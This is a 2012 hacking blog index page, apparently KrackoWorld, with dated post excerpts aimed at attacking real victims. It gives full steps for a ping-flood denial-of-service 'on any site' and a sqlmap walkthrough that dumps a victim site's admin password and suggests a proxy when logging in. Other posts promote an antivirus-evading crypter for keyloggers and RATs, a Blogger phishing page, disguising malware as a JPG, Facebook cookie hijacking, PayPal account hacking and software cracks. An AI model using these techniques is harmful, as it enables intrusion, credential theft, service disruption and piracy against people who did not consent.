Now you all can invite me on skype for any kind of help required as my username is krackoworld


28 December 2012

How Hackers can Make Money with PayPal Bug Bounty Programs?


PayPal Bug Bounty Program
Making Money in today's world is something not too difficult for a skilled person. Now Hackers and Researchers can make money via various programs online including PayPal Bug Bounty Program. PayPal as you all knows world leading site in sending and receiving money online. In a recent blog by Michael Barrett, Chief Information Security Officer of Paypal, he stated that if you manage to find a security flaw in any of the Paypal sites or products, then you will be rewarded with huge amount of cash. While Barrett till now did not stated how much cash the company will be offering but disclosed some vulnerability categories as stated below.

24 December 2012

Latest New Instagram Followers Hack 2012


Instagram followers hack
Well in today’s post i am not going to mention any hack, its just a service offered by KrackoWorld on the Christmas eve. Now I am here to give you some original Instagram Followers up to 10k and the rates are given below. But first let me define what Instagram is? Instagram is an online photo-sharing and social networking site that enables its users to take a picture, apply a digital filter and share it on a variety of social networking services, including its own etc.

21 December 2012

WordPress Pingback Vulnerability- New!


WordPress Pingback Vulnerability
There is no doubt that one of the best Blogging Platform WordPress has so many vulnerabilities- some are fixed and some are yet to be discovered. This week Accunetix a web application security company reported vulnerabilities found in the Wordpress Pingback feature. According to this report, Pingback vulnerability exists in the WordPress blogging platform that could leak information and lead to distributed denial of service (DDoS) attacks mainly.

16 December 2012

Comparison Chart Between Ethical Hacking and Penetration Testing


In this world, many people are still confused between Ethical hacking and Penetrating Testing till now. Thats why today I came up with an post on Ethical hacking vs. Penetrating Testing. I have collected the data from various sites and hope you all will like it very much. Enjoy...

12 December 2012

Download Free Microsoft Office 2012 Keygens + Crack


Wow! After being a long long time exams today i am back with a boom post on free Microsoft Office 2012 Keygens and Crack/Patch. As you all knows that Microsoft being a great company of all time and its products like Windows, Office are really awesome and useful. Recently Microsoft Office 2012 has hited its all records made previously. But the problem is that to use it in full version we have to either purchase it or get the free keygens or crack of it. Therefore today in this post, i am going to give you some free working Microsoft Office 2012 key generators and crack also. Just stay Focused below!

28 November 2012

How to Install Hacking Keylogger in iPhone


Now a days as you all knows every machine has a keylogger installed to see another user's password, activities and many more. But what if I will give you a keylogger for iPhone iOS? Well its just awesome and having too much fun especially for hackers. Therefore a new app named as iKeyMonitor comes into play. The iOS Keylogger for iPhone and iPad that logs keystrokes, passwords, websites and captures screenshots, provides users with detailed guide about how to install it here. So lets download it. Enjoy!!!

13 November 2012

How to do DOS Attack via CMD?



DOS_attack Well According to Hackers dictionary, DOS Stands For Denial of Service Attack and it is an easy way by which we can attack any website from our home PC. DOS attacks can target end-user systems, servers, routers and Network links(websites). Today in this article, we are going to learn How to implement it with your Computer Command Prompt. Have a look! 

Requirements:-
1- Command Prompt (CMD or DOS)
2- IP Address of the Targeted Site

How To get IP Address of any Website?

1. Open your CMD (command prompt) and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)
It will show you IP of the site.

How to do DOS attack with CMD:

Ok now write this command in CMD For Attack on Any Site/ Server.
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DOS attempts.. you can change the value "10000000" with your desired value you want to attempt attack.

SITE-IP= Replace the text with the IP address of the site you want to be attacked…
-w 0.00001 = It is the waiting time after one ping attack.

Keep NOTE: Don’t Change or Remove -l, -n and -w in this command. Otherwise you will not able to attack!!!

That’s it! Enjoy and Happy Diwali.


03 November 2012

How to Download Torrents Using IDM- 100% Working Trick 2012


download torrents via idm Well the most interesting things on Internet is to download software's, songs, videos and games via Torrent sites but the problem is that it offers slow speeds. The reason of such slow speeds is that the torrent sites provide us files based on leeches and seeds. Whenever you download a torrent file, you need to make sure that Number of  ”Leeches” is  always very less in number as compared to the number of “Seeds” [Seeds indicate the number of people who have already downloaded the torrent file. Leeches represent those who are currently downloading the file]. Now think if i say you can download these torrent files via IDM then what? Yes its true, today i am going to share this tutorial on How to Download Torrents using Internet download Manager just below. Have a look!


26 October 2012

How to Visit any Forum or Website Without Registration


forum Want to surf any site/Forum without registering yourself as it kills our time and boring also, if Yes then you are at the right place as today i am going to tell you the trick working behind it. Earlier I had mentioned a website named Bugmenot which gives you the free usernames and passwords for every website who you want to visit and login but today we will do it with different way as mentioned below. Have a look!

What is the trick?

Its a fact that all websites and forums will block unregistered users, but they won’t block Google Bot. What we will do is to switch our User Agent to that of Google Bot and freely browse any site or forum without registering. Hence here we will use a Firefox add-on named as user agent to act like Google Bot.

How to Visit/Surf any Forum or Website Without Registering?

1. First grab the add-on for Firefox and and install it. Now go to Tools > User Agent Switcher > Options and then again to Options.

2. User agent switcher options Select User Agent from the left sidebar and click Add. Now in the description field type:-

crawl-66-249-66-1.googlebot.com
and in user agent field type:
Googlebot/2.1 (+http://www.googlebot.com/bot.html)

As shown in the screenshot below…

bypass forum registration 3. Now Adding a new user agent Select Google Bot as your User Script by going to Tools > User Agent Switcher

demo4. Hence Selecting google bot as user agent and you will be done by now! Enjoy and dont forgot to share your feedback below in the Comment Box.


18 October 2012

How to Hack Websites via SQL Map?


sqlmap Hi friends How are you? I hope all are fine and Today by managing some time, I am going to tell you the procedure of Website Hacking using SQL Map. So first lets start with its definition. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers properly. Now to start with this tutorial all you need is 3 things as mentioned below.

1. Backtrack 5

2. Vulnerable Website

3. Little bit Mind

Procedure for Hacking Websites using SQL Map 2012

1. First of all Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. ( In this case, I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter. (refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. For that you need to enter this command into your terminal and simply press Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command below and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Just grab the columns from the admin table and

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password too
9. Here we will grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

10. That's it! Enjoy hacking.

Any Comments are Welcomed Below…


07 October 2012

How to Unlock New iPhone 5 with AT&T Easily


iphone-5-unlock Now a days its being the surrounding of with the latest release of new iPhone 5. Recently Apple iPhone 5 breaks all its records and sells approximately 3 million products in almost 3 days. But Some people cant unlock it due to its strong security lock with AT&T contract. Unlocking should be difficult in different countries and costly too that’s why today i am going to write on its unlocking in easy manner. Have a look!

What does Unlocking means?

Typically, the process of unlocking an AT&T iPhone is a lengthy one. Users have to fill out a form online, send AT&T a fax, and then wait around for a few days while everything processes. If you have bought an AT&T iPhone 5 without a contract over the past few days, chances are that you want to unlock it to use it on another carrier.

How to Unlock iPhone 5 in easy way- 2 Different Methods:

Method #1.

1. First, plug in your iPhone properly.

2. Next open up iTunes. You’ll need to be on the latest version which is version 10.7.

3. Then, click your AT&T iPhone 5 when it appears on the left-hand side. You’ll be taken to a screen that has the option you see below.

Screen Shot 2012-09-26 at 4.00.13 PM

4. Hit the Restore button and afterwards, you should be greeted with a message that says: “Congratulations, your iPhone has been unlocked.” If you got that message, then you know your AT&T iPhone 5 is unlocked and ready for another carrier if you so desire.

Once complete, owners are free to slim down a Micro SIM card to fit inside the iPhone 5′s Nano SIM card slot. Owners can also wait until October to pick up a Nano SIM from T-Mobile itself and many more.

Method #2.

  • First locate the iPhone IMEI (International Mobile Equipment Identity) number and make a note of it:
    1. Go to Tap Settings then tap General
    2. Now Tap “About” and scroll down to find “IMEI”
  • Call AT&T either by dialing 611 from your iPhone, or call 1-800-331-0500 and then dial 0010 to immediately speak to a AT&T representative and skip the hold time (International users dial this number: 1-800-335-4685)
  • Now request your iPhone to be unlocked, provide the IMEI number of the device to  representative , and then wait for the instructions to be emailed to you.

Now AT&T will initiate a request to unlock your iPhone and after that you have to restore your iPhone through iTunes software to complete the device unlock. After device unlocked, a micro-SIM from any networks like T-Mobile will now work in the iPhone.

That's it! Enjoy the Power of iPhone 5…


01 October 2012

How to Secure Your Networking System from Hackers?


demoWho can disrupt your business more than hackers? They are the unethical PC terrorists who peruse the web world for networks having no or little security. Once a weak networking system is encountered by them, they intrude into your PC through that and steal all your confidential data and information. Hackers get a kind of pleasure in attacking your network and bringing your business to the knees.

But is there any way you can deal with these hackers. Yes, there is…Here are some preventive measures to guard your network system from the unethical hackers.


24 September 2012

Learn How to Crack Local WPA2 Wifi Network Passwords?


how to hack wifi passwordsLast month I get lots of emails from my Indian friends that How to crack WPA/WPA2 Wifi passwords in simplest way using Ubuntu, now for that today i am here. Wifi is your wireless gateway to the internet and makes surfing even fun. Therefore today we will learn How to crack WPA2 network key using Reaver. In simple words, Reaver is a new, free, open-source tool which can exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. So lets the Crack in method below. Enjoy!


17 September 2012

How to Download Blocked/Restricted Videos from YouTube


download youtube videosAccording to YouTube new Policy, its being restriction in downloading videos from their site. Hence you can only watch at YouTube but that's a big problem for us who download videos at bulk via IDM. The error message you have seen is http error 1.01 . Now to solve that issue and download HD videos as regularly i have a trick mentioned below. Lets have a sharp look.


13 September 2012

Simple Safe Surfing Tips to Avoid Malware


surfing tipsIt is unfortunate, but there are a lot of threats to your system security and your personal security when you are using the internet. There are scammers, phishers, hackers and all other sorts of cyber criminals who are essentially after your money or your information (so they can steal money in your name). One of the most popular ways for cyber criminals to carry out their nefarious actions is through malicious software. Usually called malware, there is a whole host of types of parasites that can infect your system including, but not limited to, spware, adware, worms, trojans and viruses.


05 September 2012

Windows 7 Activator Free Download- 100% Working


Windows-7-Loader-eXtreme-Activator-Edition-v3.5Well after a lot of time today by managing some time I am going to write an post on Windows 7 Activator to activate your Windows for forever instead of trail version. Windows 7 is the awesome operating system of the Microsoft and now a days they are just allowing this OS for 30 days only. Hence to make it full a software named Windows 7 activator comes into play which i gonna provide downloading link later below. Keep note that windows 7 activator will active your windows in just 5 min. So without wasting much time lets know how to activate your Windows 7 and make it genuine one.


29 August 2012

Phishing Sites- How to Avoid them?


phishing sitesTechnology has provided more and more venues for people to do transactions. It opened a lot of bridges for people from all around the globe.
On the other hand, not all people are using this for the good of mankind. In fact, there are still those who abuse it and use it to deceive others. Consumers nowadays should be more observant of the things that they are going to deal with and here are a few ideas to avoid them.
Be suspicious. Never trust all the messages that are getting in to your inbox. Make sure that you check the background of the mail before opening it.
It can harm you even if your closest friend was the one who sent it. You can verify by asking the person sending it. Send them personal messages to know whether they really sent the item.


14 August 2012

Top 7 Free VPN Services


vpn servicesFirst of all let me clear you what a VPN is? VPN stands for Virtual private Network. Basically it is a private network constructed within a public network infrastructure, The data traveling between you and those servers is encrypted, and the IP address that will appear will surfing or downloading content from the Internet will be that of the server and not your own. Generally People do use VPN mainly for 7 reasons as given below-

1. When their IP gets banned from forums, YouTube or any other website.
2. They don't want to exposure their IP address while surfing (protect privacy).
3. Bypass geographical blocks from certain websites.
4. Bypass ISP Blocking for VOIP Applications like Skype.
5. ISP Protection.
6. To avoid DNS filtering and
7. Unlike a proxy, you get secured connection for all programs you are using.


10 August 2012

Facebook Fake Accounts Story- Infographic


facebook-has-83m-fakesI was totally shocked when Facebook says that there are about 83 million accounts on their network that they believe to be fake. By estimating calculations around 8.7% of their accounts are faked or bogus in which 955 million users are having fake profiles. Out of these 8.5% accounts 4.8% belong to that users who maintain duplicate accounts. Note- Maintaining duplicate accounts does violate the terms and conditions of Facebook. This is extremely Spam for Facebook that's why Facebook Experts are now working on it to soon have a solution and good algorithm for creating a new account. So lets check an Infographic of Facebook Fake Accounts just below. Have a look!


03 August 2012

How monitoring apps can provide Security to your smartphone?


Monitoring_appsIt is very important to protect your smartphone as it is like a mini computer that contains essential private and business data. So, it is indeed worth taking few preventive steps to secure your smartphones. Most individuals do not feel the importance of safeguarding their smartphones, but it is certainly necessary to avoid unwanted problems to crop up in your life. If you are a business owner, you will know the consequences of confidential data of your company being leaked out. Well, in order to protect the secrecy of the company, you must and should protect your smartphone. Some of the basic tips are as following.

31 July 2012

Yahoo Voices Hacked! Around 450K Account Passwords Leaked


Over-450-000-Usernames-and-Passwords-Leaked-Likely-from-Yahoo-VoicesSecurity is that thing which can never be compromised. Same happens with Yahoo recently around 450,000 login passwords posted/leaked on internet by the hacker group- D33ds. A list titled “Owned and Exposed” which is “brought to you by the D33Ds Company” was posted online revealing a number of details for the service including all of the email addresses and passwords for Yahoo Voices’ 450,000 users. Now if you are a Yahoo member its time to change your password. The affected accounts appeared to belong to a voice-over-Internet-protocol, or VOIP, service called Yahoo Voices, which runs on Yahoo’s instant messenger. So lets read it more on How Yahoo Hacked?


28 July 2012

Hotfile,Mediafire,Filefactory,4Shared,Rapidgator Premium Link Generator- 100% Working


premium-link-generatorHi friends! How are you and I hope all you are fine. After such a long time today i am going to share a tutor on How to get Premium link for file hosting sites. As you all knows that these sites did not allow free users to download things at full speeds. Hence you have to purchase an plan for becoming Premium user and then download things at full speeds with no advertisement but instead of this today i am going to present a site named Leechfire which will generate a premium link for normal free downloads. So lets know How to do it just below.


23 July 2012

Top 5 htaccess Hacks for Securing your WordPress blogs from Hackers


htaccess Hacks for Securing your WordPress blogsNow a days hackers are more concentrating on WordPress Hacking as WordPress blogs are much more vulnerable to it. I have also written an detailed post on How to secure your WordPress blogs from getting hacked previously. Now today I am going to tell you some best 5 htaccess hacks 2012 to secure your WordPress blogs from getting hacked by the hackers. You can find your .htaccess file in your web root directory. So lets Have a look and don't edit or play with these mentioned codes below.


19 July 2012

What to do After Your Cell Phone is Lost or Stolen?


cell phone lostIt could happen anytime. You reach into your pocket and lo and behold, your trusty cell phone is missing. After back-tracking through your activities for the day, it starts coming back to you slowly and then you realize; the last time you had your cell phone was at the club with some friends the night before. There’s a strong possibility that your cell phone is lost or stolen. Now, what to do?


16 July 2012

Win a Free Copy my eBook Power of Hacking Worth $20


Win a Free Copy my eBook Power of Hacking Worth $20Hi friends as you all knows that in Dec 2011 I have officially launched my eBook on Power of Hacking for those newbie people who want to learn Ethical Hacking from basics. I had already sold its 50 copies to people but at payment terms. Now the problem is that i am getting huge requests from my readers to give it for free of cost but i cant afford this so that's why i am opening this much contest at here. So please participate in this contest and review the guidelines below to win my eBook at free of cost.

 


14 July 2012

Latest Aircel 3G Hack 2012 for Super Fast Downloading


Latest Aircel 3G Hack 2012Today you will be glad to know that i am posting an another Aircel 3G Hack 2012 for super fast surfing and downloading. I get around 1 MBPS speed in my network (Punjab). So please try and check this hack given below. Note- This is a official trick by Aircel for new customers and for that existing customers who have not used their 3G services yet on the SIM. Also this trick works only 1 time so please don't be smart anymore and try again n again. Enjoy!


13 July 2012

Download Fully Undetectable Crypter 2012 to Bypass Antivirus Detection


Download Fully Undetectable Crypter 2012At krackoworld I have availed many premium Crypters/Keyloggers to download for free of cost to make Remote keylogging as easy. Last month, Its being huge demand from my readers to post more and more crypters and keyloggers at here. So today I am going to give you an another crypter named as FUD Crypter 2012 to bypass antivirus detection at all just below. This crypter is FUD that means Fully Undetectable and has the ability to bind/Melt and hide your remote keylogger as well. You can also do encryption mode as AES Encryption for better results. With this keylogger, you can encrypt our Keyloggers, Rats and Trojan as well. Now just start sending remote keyloggers to anyone's PC without worrying about antivirus detection and make Hacking more easier than ever. Cheers!


11 July 2012

Top 3 Best Facebook CityVille Game Hacks of 2012


Cityville_zyngaCityVille is considered as one of the best and popular games ever found on Facebook. It is a casual social city-building simulation game developed by Zynga which was released in December 2010. The game is very similar to SimCity and Farmville. The goal is to develop a city by farming, constructing buildings, and collecting rent. The game is a freemium game, meaning there is no cost to play but players have the option of purchasing premium content. So today I am going to show you some of its best 3 hacks for 2012 which I liked the most. Have Fun!


09 July 2012

How to Protect yourself from DNS Changer Malware


DNS Changer MalwareNow a days you might be heard about DNS Changer Malware. Yes if you are planning to use internet on Monday then you might want to join the thousands of people who are checking their computers to make sure they won't lose connection. Well DNS Changer Malware may shut down thousands or millions of computer on Monday, July 9 2012. The main cause of this shutdown is DNS Changer malware which was constantly being used by cyber criminals to access confidential data from throughout the world. So lets read on How to protect or fix this DNS changer issue just below.


07 July 2012

Top 5 Best Google Chrome Security Extensions


Top-5-Security-Extensions-For-The-Chrome-BrowserAs you all knows that Google Chrome is one of the best browser ever in this world. It is developed by Google and really works very fast plus reliable. Around Millions of people are using it and also comes with lot of great add-ons. So Today I am going to share some Top 5 Chrome Extension of 2012 to increase Web Security just below. Enjoy!


05 July 2012

CrystalAEP - Anti-Exploit Protection Tool





CrystalAEP is designed to provide frontline protection against Internet-borne threats such as viruses and malware. Unlike the typical anti-virus program, Crystal does not attempt to recognise threats based on signatures, and does not require constant updating to protect against the latest threats. Crystal works instead by manipulating at-risk software while it runs to help form an environment which is hostile to Internet worms, malware and other types of malicious code.

04 July 2012

How to Run JPG Image as .Exe


jpg image into exeAt KrackoWorld this is the first time ever i am sharing a tutorial on File extension changer. Its very helpful in Hacking. Hence Today i am going to show you How to run JPG image as .exe file just below. This exploit is somewhere different than changing the extension to .jpeg and then the file gets corrupted. So for example lets say, you have created a file server.exe using keylogger or Rat, but you want it to look like a JPG file, so people would run it and get hacked.

02 July 2012

Some Quick Tips to Secure your Facebook Account in 2012


facebook security tipsSecurity is must in every field whether it is of your Home security or Facebook account Security. Now a days Facebook hacking is become a passion of every hackers and they are creating/exploiting new ways of Facebook hacking everyday with full spirit. Hence you must be a security expert of reside in this world. Therefore today i cam up with some quick tips on How to secure your Facebook account online in 2012. Have a look at below.


30 June 2012

Top 8 Ways on How to Hack a PayPal Account


How to Hack a PayPal AccountPayPal is one of the leaders in online money transection site. It is a part of eBay Inc. and a US $2.23 billion worth company! :> Around 75% of online money transfer is now made via PayPal. With PayPal, we can shop, buy products/items/goods, domains, web hosting etc. as it is accepted over 190 countries. PayPal comes with 3 types of accounts one is personal, second is premium and third is business, you can choose what suites you best. You can send,receive,withdraw and even hold Payments at PayPal for various purposes. But do you know that PayPal is considered as the best place for hackers to do hacking in 2012 as it has many bugs! Yes its true today i will teach you the top 8 ways by which we can hack PayPal accounts easily below. Enjoy!


28 June 2012

How to Bypass Antivirus Detection with Metasploit


metasploit-logoDue to tremendous demand of this article by my loyal readers today i am going to post it below. Yes the article is about How to bypass antivirus detection with Metasploit. Even many users want a solution for their keyloggers, stealers and RAT also. Thus in the process of penetrating testing and ethical hacking, antivirus try to defend an operating system. Therefore to explain this tutorial in deep, i am posting a video tutorial below by John Strand. Enjoy!


26 June 2012

Download Blogger BlogSpot Phishing Page


Download Blogger BlogSpot Phishing PagePhishing is one the most easiest and successful methods of hacking accounts in 2012. At KrackoWorld there are lots of phishing page discussed and downloaded but now its turn for Blogger BlogSpot phishing page which majority of the people needs! To hack Blogger accounts via phishing page all you need to upload the data given in the downloading file to any webhosting site and then send the url of the index.html to your victim, once he/she opened that page and entered his/her login details, your mission is done! You successfully hacked your victim’s account and all his/her login information will be stored in a new .txt file present in your free web hosting account. To learn more on Phishing attacks and how to do it ? then please click here.


24 June 2012

Top 10 Hackers of all Time in the World- 2012


Top 10 Hackers of all Time in the World- 2012To be a hacker its my duty to introduce you to the Top 10 Hackers in 2012. These hackers are being so strong as they can hack anything. They are certified as well as trained. Most of them are now working as on job of Security Experts from high companies due to their skills. So lets see who's on top and leading the race!


23 June 2012

Learn YouTube Hacking


YouTube is one of the biggest video sharing site ever owned by Google authority. YouTube stands out no.3 is Alexa rankings after Facebook. Now a days its hacking is being increased a lot such as hacking YouTube Views, Likes, applying secret tricks and cracking of YouTube accounts mainly. Therefore today i am going to post an eBook written by Raj Chandel of www.hackingarticles.in which consists of list of all possible YouTube hacking tips and tricks. Note- This eBook is available in PDF format only and seems to be very helpful and interesting. Enjoy!


21 June 2012

List of Best Online Website Scanners


complete list of antivirus scanner onlineNow a days our website might be victim of some great viruses so its our duty to scan it must using tools and software's online. Therefore I mad a list of top 7 online website virus scanners just below. These websites provide much better results than a software installed on your computer. Virus scanning and malware detection is free in these websites below. Enjoy!


20 June 2012

Top 50 Best Password Cracking Tools of 2012


password-crackingNow a days there are many password cracking tools available for cracking of account passwords in easy way but the problem is that either they are on paid terms or available at demo version only. Hence we need to crack it by patching or search some free one. Therefore to overcome this problem today KrackoWorld brings you the Top 50 collection of password cracking tools used mostly in 2012 and the good is thing is that all you get it free at one single place. Cheers!

18 June 2012

Top 10 reasons why your PC Sucks


pc crashs10 reasons why PCs crash- U must Know:

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?


17 June 2012

How to Hack a Facebook Password Using Cookie Dart- 100% Working


Its being a long time since I am writing huge list of articles on Facebook Hacking to bring you the best things available ever. Now I think all of might be aware of basic Facebook account password including Phishing, Keylogging, Reverting, Social Engineering, Recovery method Techniques etc. Hence today I am going to show you to hack Facebook accounts via Cookie Dart that means capturing your victims browser cookie via poplar tools like Wireshark and then injecting  it to your browser through cookie injector and accessing his/her account for free. So lets start the process below.


15 June 2012

Configure Your Apache Servers with ApacheConf


apacheconfApache is the most popular powerful HTTP server software ever which provides many features like DBMS (Database Management System), Content negotiation and Virtual host etc. Apache has also built in search engine and an HTML authorizing tool that supports FTP mainly. Apache is developed and maintained by an open community of developers under the auspices of the Apache Software Foundation. The application is available for a wide variety of operating systems including Unix, Linux, Solaris, Mac OS X, Microsoft Windows, TPF and FreeBSD. Released under the Apache License, Apache is open-source software. Hence Apache was originally based on NCSA HTTPd code. Now today in this post i am going to tell you about ApacheConf which is used  to represents all the information from the httpd.conf file, from the included files, from the log files, .htaccess, .htpasswd and .htgroup in the structured view. It also represent password files of the users and more features has been available.


 

Recent Posts

Review this blog on Bloggers.com

Recent Comments

| KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |